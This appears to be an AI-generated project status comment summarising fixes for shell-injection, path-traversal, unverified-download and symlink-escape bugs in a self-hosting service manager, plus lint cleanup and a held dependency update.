- **#2452** — MCP service-lifecycle tools (`manage_service`, `deploy_service`, `rename_service`, `delete_service`, `restore_trashed_service`) accepted bare strings for identifiers instead of the strict `ServiceName` pattern the REST routes already enforce, which were then interpolated unescaped into shell commands. Now validated with the same schema before reaching exec. Found and fixed a **second** related hole during self-verify: the trash-id regex allowed `..`, which could have let a trash operation escape into the systemd Quadlet directory.
- **#2453** — `home-assistant`'s `post-deploy.py` extracted a downloaded release tarball without checking for path-escaping entries (`../`) and without verifying the download's integrity — a compromised upstream release or a MITM was a root-level arbitrary-write primitive. Now rejects escaping tar entries before extraction and verifies a pinned SHA-256 before extracting.
- **#2454** — `backup-worker`'s staging step followed symlinks when resolving manifest-included paths, so a compromised service with a symlink pointing at a sibling service's data directory could exfiltrate that sibling's data into its own offsite backup. Now containment-checked against the service's own real data root.

**Lint ratchet burn-down** (#2430 follow-up, 3 sweep units): StackInstallFlow, the disk-import page, and PublicDomainSection. `sb/no-raw-color-literal` baseline down from 961 to 832.

**dep-update-sweep** — no safe merges; #2291 (TypeScript 6→7) still genuinely CI-red, held again.

<!-- sb-ai-comment -->
🤖 _AI-generated, acting for @mdopp._
